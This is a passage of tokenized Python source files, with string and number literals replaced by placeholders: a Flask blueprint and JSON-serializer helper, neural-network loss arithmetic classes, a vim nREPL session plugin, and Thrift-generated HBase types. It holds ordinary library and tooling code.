<s> import pkgutil <EOL> import importlib <EOL> from flask import Blueprint <EOL> from flask . json import JSONEncoder as BaseJSONEncoder <EOL> def register_blueprints ( app , package_name , package_path ) : <EOL> """<STR_LIT>""" <EOL> rv = [ ] <EOL> for _ , name , _ in pkgutil . iter_modules ( package_path ) : <EOL> m = importlib . import_module ( '<STR_LIT>' % ( package_name , name ) ) <EOL> for item in dir ( m ) : <EOL> item = getattr ( m , item ) <EOL> if isinstance ( item , Blueprint ) : <EOL> app . register_blueprint ( item ) <EOL> rv . append ( item ) <EOL> return rv <EOL> class JSONEncoder ( BaseJSONEncoder ) : <EOL> """<STR_LIT>""" <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , JsonSerializer ) : <EOL> return obj . to_json ( ) <EOL> return super ( JSONEncoder , self ) . default ( obj ) <EOL> class JsonSerializer ( object ) : <EOL> """<STR_LIT>""" <EOL> __json_public__ = None <EOL> __json_hidden__ = None <EOL> __json_modifiers__ = None <EOL> def get_field_names ( self ) : <EOL> for p in self . __mapper__ . iterate_properties : <EOL> yield p . key <EOL> def to_json ( self ) : <EOL> field_names = self . get_field_names ( ) <EOL> public = self . __json_public__ or field_names <EOL> hidden = self . __json_hidden__ or [ ] <EOL> modifiers = self . __json_modifiers__ or dict ( ) <EOL> rv = dict ( ) <EOL> for key in public : <EOL> rv [ key ] = getattr ( self , key ) <EOL> for key , modifier in modifiers . items ( ) : <EOL> value = getattr ( self , key ) <EOL> rv [ key ] = modifier ( value , self ) <EOL> for key in hidden : <EOL> rv . pop ( key , None ) <EOL> return rv </s>
<s> from . . import backend as T <EOL> class Loss ( object ) : <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> self . _calc_loss = None <EOL> self . updates = [ ] <EOL> self . _grads = None <EOL> def get_inputs ( self ) : <EOL> inputs = self . model . get_formatted_input ( ) <EOL> return inputs <EOL> def get_updates ( self ) : <EOL> return self . model . get_updates ( ) + self . updates <EOL> def get_activation ( self , ** kwargs ) : <EOL> return self . model . get_activation ( ** kwargs ) <EOL> def get_final_input ( self ) : <EOL> return self . get_inputs ( ) <EOL> def compute_loss ( self , y , ** kwargs ) : <EOL> return self . loss ( self . get_activation ( use_dropout = True , ** kwargs ) , y ) <EOL> def loss ( self , y_pred , y ) : <EOL> if y_pred . is_sequence ( ) : <EOL> return T . mean ( self . sequence_loss ( y_pred , y ) ) <EOL> return self . _loss ( y_pred . get_data ( ) , y ) <EOL> def sequence_loss ( self , y_pred , y ) : <EOL> def step ( y_pred_i , y_i ) : <EOL> return self . _loss ( y_pred_i , y_i ) <EOL> output , self . updates = T . scan ( step , [ y_pred . get_data ( ) , y ] ) <EOL> return output <EOL> def get_parameters ( self ) : <EOL> return self . model . get_parameters ( ) <EOL> def __mul__ ( self , x ) : <EOL> return MulLoss ( self , x ) <EOL> def __rmul__ ( self , x ) : <EOL> return MulLoss ( self , x ) <EOL> def __add__ ( self , x ) : <EOL> return AddLoss ( self , x ) <EOL> def __radd__ ( self , x ) : <EOL> return AddLoss ( self , x ) <EOL> def __sub__ ( self , x ) : <EOL> return SubLoss ( self , x ) <EOL> def __rsub__ ( self , x ) : <EOL> return SubLoss ( self , x ) <EOL> def __div__ ( self , x ) : <EOL> return DivLoss ( self , x ) <EOL> def __rdiv__ ( self , x ) : <EOL> return DivLoss ( self , x ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> class ArithmeticLoss ( Loss ) : <EOL> def __init__ ( self , left , right ) : <EOL> self . left , self . right = left , right <EOL> self . 
_calc_loss = None <EOL> def get_activation ( self , ** kwargs ) : <EOL> return self . left . get_activation ( ** kwargs ) <EOL> def get_updates ( self ) : <EOL> updates = self . left . get_updates ( ) <EOL> if isinstance ( self . right , Loss ) : <EOL> for update in self . right . get_updates ( ) : <EOL> if update not in updates : <EOL> updates . append ( update ) <EOL> return updates <EOL> def get_inputs ( self ) : <EOL> inputs = self . left . get_inputs ( ) <EOL> if isinstance ( self . right , Loss ) : <EOL> for update in self . right . get_inputs ( ) : <EOL> if update not in inputs : <EOL> inputs . append ( update ) <EOL> return inputs <EOL> def get_parameters ( self ) : <EOL> parameters = self . left . get_parameters ( ) <EOL> if isinstance ( self . right , Loss ) : <EOL> for parameter in self . right . get_parameters ( ) : <EOL> if parameter not in parameters : <EOL> parameters . append ( parameter ) <EOL> return parameters <EOL> def compute_loss ( self , y , ** kwargs ) : <EOL> left = self . left . compute_loss ( y , ** kwargs ) <EOL> if isinstance ( self . right , Loss ) : <EOL> right = self . right . compute_loss ( y , ** kwargs ) <EOL> else : <EOL> right = self . right <EOL> return self . op ( left , right ) <EOL> def op ( self , x , y ) : <EOL> raise NotImplementedError <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . left , self . op_str , self . right ) <EOL> class MulLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:*>' <EOL> def op ( self , x , y ) : <EOL> return x * y <EOL> class DivLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:/>' <EOL> def op ( self , x , y ) : <EOL> return x / y <EOL> class AddLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:+>' <EOL> def op ( self , x , y ) : <EOL> return x + y <EOL> class SubLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:->' <EOL> def op ( self , x , y ) : <EOL> return x - y </s>
<s> from . data import * <EOL> from . lstm import * <EOL> from . generate import * </s>
<s> import vim <EOL> import sys <EOL> import os . path <EOL> import nrepl <EOL> from urlparse import urlparse <EOL> nrepl_connections = { } <EOL> def detect_project_repl_port ( ) : <EOL> port_files = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for pf in port_files : <EOL> if os . path . exists ( pf ) : <EOL> with open ( pf , '<STR_LIT:r>' ) as f : <EOL> return int ( f . read ( ) . strip ( ) ) <EOL> def split_session_url ( url ) : <EOL> components = urlparse ( url ) <EOL> host_port = components . netloc . split ( '<STR_LIT::>' ) <EOL> if len ( host_port ) < <NUM_LIT:2> : <EOL> raise Exception ( '<STR_LIT>' % ( url ) ) <EOL> return components . scheme , host_port [ <NUM_LIT:0> ] , int ( host_port [ <NUM_LIT:1> ] ) , components . path [ <NUM_LIT:1> : ] <EOL> def join_session_url ( components ) : <EOL> return "<STR_LIT>" % components <EOL> def get_sessions ( connections ) : <EOL> for ( scheme , host , port ) , ( conn , sess_list ) in connections . iteritems ( ) : <EOL> for session in sess_list : <EOL> yield join_session_url ( ( scheme , host , port , session ) ) <EOL> def get_buffer_map ( ) : <EOL> result = { } <EOL> for buf in vim . buffers : <EOL> session_url = buf . vars . get ( '<STR_LIT>' ) <EOL> if session_url : <EOL> result . setdefault ( session_url , [ ] ) . append ( buf . name ) <EOL> return result <EOL> def create_session ( scheme , host , port ) : <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> if not conn : <EOL> conn = nrepl . connect ( port , host , scheme ) <EOL> sess_list = set ( ) <EOL> nrepl_connections [ ( scheme , host , port ) ] = ( conn , sess_list ) <EOL> session = nrepl . open_session ( conn ) <EOL> sess_list . 
add ( session ) <EOL> return conn , session <EOL> def project_repl ( ) : <EOL> port = detect_project_repl_port ( ) <EOL> if port : <EOL> conn , session = create_session ( '<STR_LIT>' , '<STR_LIT:localhost>' , port ) <EOL> return conn , session , join_session_url ( ( '<STR_LIT>' , '<STR_LIT:localhost>' , port , session ) ) <EOL> return None , None , None <EOL> def find_session ( url ) : <EOL> scheme , host , port , session = split_session_url ( url ) <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> if conn and session in sess_list : <EOL> return conn , session <EOL> return None , None <EOL> def session_exists ( scheme , host , port , session ) : <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> return conn and session in sess_list <EOL> def close_session ( url ) : <EOL> scheme , host , port , session = split_session_url ( url ) <EOL> if session : <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> if conn : <EOL> nrepl . close_session ( conn , session ) <EOL> sess_list . remove ( session ) <EOL> if not len ( sess_list ) : <EOL> nrepl . disconnect ( conn ) <EOL> del nrepl_connections [ ( scheme , host , port ) ] <EOL> def is_our_buffer ( buf ) : <EOL> return buf . name . endswith ( '<STR_LIT>' ) <EOL> def find_our_bufffer ( ) : <EOL> for b in vim . buffers : <EOL> if is_our_buffer ( b ) : <EOL> return b <EOL> def find_our_window ( ) : <EOL> for w in vim . windows : <EOL> if is_our_buffer ( w . buffer ) : <EOL> return w . number <EOL> def remove_trailing_new_line ( subject ) : <EOL> if subject and subject [ - <NUM_LIT:1> ] == '<STR_LIT:\n>' : <EOL> return subject [ : - <NUM_LIT:1> ] <EOL> return subject <EOL> def output_data ( data , target = sys . stdout ) : <EOL> b = find_our_bufffer ( ) <EOL> if b : <EOL> b . append ( remove_trailing_new_line ( data ) . 
split ( '<STR_LIT:\n>' ) ) <EOL> else : <EOL> print >> target , data <EOL> def scroll_to_end ( buf ) : <EOL> win_num = find_our_window ( ) <EOL> if win_num : <EOL> vim . command ( str ( win_num ) + '<STR_LIT>' ) <EOL> vim . command ( '<STR_LIT>' ) <EOL> vim . command ( '<STR_LIT>' ) <EOL> def response_completed ( ) : <EOL> buf = find_our_bufffer ( ) <EOL> if buf : <EOL> buf . append ( '<STR_LIT:;>' + <NUM_LIT:15> * '<STR_LIT:=>' ) <EOL> scroll_to_end ( buf ) <EOL> def print_response ( response ) : <EOL> for msg in response : <EOL> if '<STR_LIT>' in msg : <EOL> output_data ( msg [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in msg : <EOL> output_data ( msg [ '<STR_LIT>' ] , sys . stderr ) <EOL> if '<STR_LIT:value>' in msg : <EOL> output_data ( msg [ '<STR_LIT:value>' ] ) <EOL> response_completed ( ) <EOL> def attach_session_url ( buf , session_url ) : <EOL> buf . vars [ '<STR_LIT>' ] = session_url <EOL> vim . command ( '<STR_LIT>' % ( buf . number ) ) <EOL> def set_buffer_session ( url ) : <EOL> if url : <EOL> scheme , host , port , session = split_session_url ( url ) <EOL> if session : <EOL> if not session_exists ( scheme , host , port , session ) : <EOL> print >> sys . stderr , '<STR_LIT>' % ( url ) <EOL> return <EOL> else : <EOL> c , session = create_session ( scheme , host , port ) <EOL> attach_session_url ( vim . current . buffer , <EOL> join_session_url ( ( scheme , host , port , session ) ) ) <EOL> print vim . current . buffer . vars . get ( '<STR_LIT>' ) <EOL> def print_sessions ( ) : <EOL> buf_map = get_buffer_map ( ) <EOL> for session_url in get_sessions ( nrepl_connections ) : <EOL> buf_names = buf_map . get ( session_url , [ ] ) <EOL> print session_url , '<STR_LIT:U+002CU+0020>' . 
join ( buf_names ) <EOL> def collect_garbage ( ) : <EOL> buf_map = get_buffer_map ( ) <EOL> for session_url in list ( get_sessions ( nrepl_connections ) ) : <EOL> if not session_url in buf_map : <EOL> close_session ( session_url ) <EOL> print '<STR_LIT>' , session_url <EOL> def clear_buffer_session ( buf ) : <EOL> vars = vim . current . buffer . vars <EOL> if buf : <EOL> vars = vim . buffers [ int ( buf ) ] . vars <EOL> url = vars . get ( '<STR_LIT>' ) <EOL> if url : <EOL> del vars [ '<STR_LIT>' ] <EOL> collect_garbage ( ) <EOL> def eval ( code , first , last ) : <EOL> conn , session = None , None <EOL> session_url = vim . current . buffer . vars . get ( '<STR_LIT>' ) <EOL> if not session_url : <EOL> conn , session , session_url = project_repl ( ) <EOL> if conn : <EOL> attach_session_url ( vim . current . buffer , session_url ) <EOL> else : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> else : <EOL> conn , session = find_session ( session_url ) <EOL> if not conn : <EOL> print >> sys . stderr , '<STR_LIT>' % ( session_url ) <EOL> if conn : <EOL> if code : <EOL> print_response ( nrepl . eval ( conn , code , session ) ) <EOL> else : <EOL> path = vim . eval ( "<STR_LIT>" ) <EOL> code = '<STR_LIT:\n>' . join ( vim . current . buffer [ first - <NUM_LIT:1> : last ] ) <EOL> print_response ( nrepl . eval ( conn , code , session , path = path , line = first ) ) </s>
<s> from thrift . Thrift import * <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol <EOL> try : <EOL> from thrift . protocol import fastbinary <EOL> except : <EOL> fastbinary = None <EOL> class TCell : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . I64 , '<STR_LIT>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , value = None , timestamp = None , ) : <EOL> self . value = value <EOL> self . timestamp = timestamp <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . I64 : <EOL> self . timestamp = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . 
writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . timestamp != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I64 , <NUM_LIT:2> ) <EOL> oprot . writeI64 ( self . timestamp ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class ColumnDescriptor : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:name>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT:3> , ) , <EOL> ( <NUM_LIT:3> , TType . STRING , '<STR_LIT>' , None , "<STR_LIT>" , ) , <EOL> ( <NUM_LIT:4> , TType . BOOL , '<STR_LIT>' , None , False , ) , <EOL> ( <NUM_LIT:5> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT> , ) , <EOL> ( <NUM_LIT:6> , TType . STRING , '<STR_LIT>' , None , "<STR_LIT>" , ) , <EOL> ( <NUM_LIT:7> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT:0> , ) , <EOL> ( <NUM_LIT:8> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT:0> , ) , <EOL> ( <NUM_LIT:9> , TType . BOOL , '<STR_LIT>' , None , False , ) , <EOL> ( <NUM_LIT:10> , TType . 
I32 , '<STR_LIT>' , None , - <NUM_LIT:1> , ) , <EOL> ) <EOL> def __init__ ( self , name = None , maxVersions = thrift_spec [ <NUM_LIT:2> ] [ <NUM_LIT:4> ] , compression = thrift_spec [ <NUM_LIT:3> ] [ <NUM_LIT:4> ] , inMemory = thrift_spec [ <NUM_LIT:4> ] [ <NUM_LIT:4> ] , maxValueLength = thrift_spec [ <NUM_LIT:5> ] [ <NUM_LIT:4> ] , bloomFilterType = thrift_spec [ <NUM_LIT:6> ] [ <NUM_LIT:4> ] , bloomFilterVectorSize = thrift_spec [ <NUM_LIT:7> ] [ <NUM_LIT:4> ] , bloomFilterNbHashes = thrift_spec [ <NUM_LIT:8> ] [ <NUM_LIT:4> ] , blockCacheEnabled = thrift_spec [ <NUM_LIT:9> ] [ <NUM_LIT:4> ] , timeToLive = thrift_spec [ <NUM_LIT:10> ] [ <NUM_LIT:4> ] , ) : <EOL> self . name = name <EOL> self . maxVersions = maxVersions <EOL> self . compression = compression <EOL> self . inMemory = inMemory <EOL> self . maxValueLength = maxValueLength <EOL> self . bloomFilterType = bloomFilterType <EOL> self . bloomFilterVectorSize = bloomFilterVectorSize <EOL> self . bloomFilterNbHashes = bloomFilterNbHashes <EOL> self . blockCacheEnabled = blockCacheEnabled <EOL> self . timeToLive = timeToLive <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . name = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . I32 : <EOL> self . maxVersions = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . STRING : <EOL> self . 
compression = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:4> : <EOL> if ftype == TType . BOOL : <EOL> self . inMemory = iprot . readBool ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:5> : <EOL> if ftype == TType . I32 : <EOL> self . maxValueLength = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:6> : <EOL> if ftype == TType . STRING : <EOL> self . bloomFilterType = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:7> : <EOL> if ftype == TType . I32 : <EOL> self . bloomFilterVectorSize = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:8> : <EOL> if ftype == TType . I32 : <EOL> self . bloomFilterNbHashes = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:9> : <EOL> if ftype == TType . BOOL : <EOL> self . blockCacheEnabled = iprot . readBool ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:10> : <EOL> if ftype == TType . I32 : <EOL> self . timeToLive = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . name != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:name>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . name ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . maxVersions != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:2> ) <EOL> oprot . writeI32 ( self . 
maxVersions ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . compression != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:3> ) <EOL> oprot . writeString ( self . compression ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . inMemory != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . BOOL , <NUM_LIT:4> ) <EOL> oprot . writeBool ( self . inMemory ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . maxValueLength != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:5> ) <EOL> oprot . writeI32 ( self . maxValueLength ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . bloomFilterType != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:6> ) <EOL> oprot . writeString ( self . bloomFilterType ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . bloomFilterVectorSize != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:7> ) <EOL> oprot . writeI32 ( self . bloomFilterVectorSize ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . bloomFilterNbHashes != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:8> ) <EOL> oprot . writeI32 ( self . bloomFilterNbHashes ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . blockCacheEnabled != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . BOOL , <NUM_LIT:9> ) <EOL> oprot . writeBool ( self . blockCacheEnabled ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . timeToLive != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:10> ) <EOL> oprot . writeI32 ( self . timeToLive ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . 
join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class TRegionInfo : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:3> , TType . I64 , '<STR_LIT:id>' , None , None , ) , <EOL> ( <NUM_LIT:4> , TType . STRING , '<STR_LIT:name>' , None , None , ) , <EOL> ( <NUM_LIT:5> , TType . BYTE , '<STR_LIT:version>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , startKey = None , endKey = None , id = None , name = None , version = None , ) : <EOL> self . startKey = startKey <EOL> self . endKey = endKey <EOL> self . id = id <EOL> self . name = name <EOL> self . version = version <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . startKey = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . endKey = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . I64 : <EOL> self . id = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:4> : <EOL> if ftype == TType . STRING : <EOL> self . name = iprot . 
readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:5> : <EOL> if ftype == TType . BYTE : <EOL> self . version = iprot . readByte ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . startKey != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . startKey ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . endKey != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . endKey ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . id != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:id>' , TType . I64 , <NUM_LIT:3> ) <EOL> oprot . writeI64 ( self . id ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . name != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:name>' , TType . STRING , <NUM_LIT:4> ) <EOL> oprot . writeString ( self . name ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . version != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:version>' , TType . BYTE , <NUM_LIT:5> ) <EOL> oprot . writeByte ( self . version ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . 
__dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class Mutation : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . BOOL , '<STR_LIT>' , None , False , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:3> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , isDelete = thrift_spec [ <NUM_LIT:1> ] [ <NUM_LIT:4> ] , column = None , value = None , ) : <EOL> self . isDelete = isDelete <EOL> self . column = column <EOL> self . value = value <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . BOOL : <EOL> self . isDelete = iprot . readBool ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . column = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . 
